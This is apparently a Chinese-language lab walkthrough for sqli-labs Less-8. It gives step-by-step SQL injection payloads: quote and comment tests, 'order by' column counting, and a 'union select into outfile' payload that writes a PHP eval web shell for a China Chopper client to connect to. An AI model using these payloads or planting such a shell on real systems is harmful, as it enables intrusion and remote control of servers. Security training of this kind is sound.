1.先判断注入类型
(1)首先看到要求,要求传一个ID参数,并且要求是数字型的;?id=1
(2)再输入:?id=1 and 1=1
(3)输入:?id=1 and 1=2
因为(2)(3)没有变化,所以不是数字型
(4)输入:?id=1'
提示消失了,说明有错误
(5)加上--+,我们再输入:?id=1' --+
结合(4)(5),我们可以看出来参数id='1'
2..对列数进行判断
(1)输入?id=1' order by 3 --+
(2)?id=1' order by 4 --+
3正常,4错误没有显示,说明是3列
3连接菜刀
(1)输入:?id=-1' union select 1,2,'<?php @eval($_POST["crow"]); ?>' into outfile "C:\phpstudy\PHPTutorial\WWW\sqli-labs-master\Less-8\my.php" --+
(2)在菜刀中添加
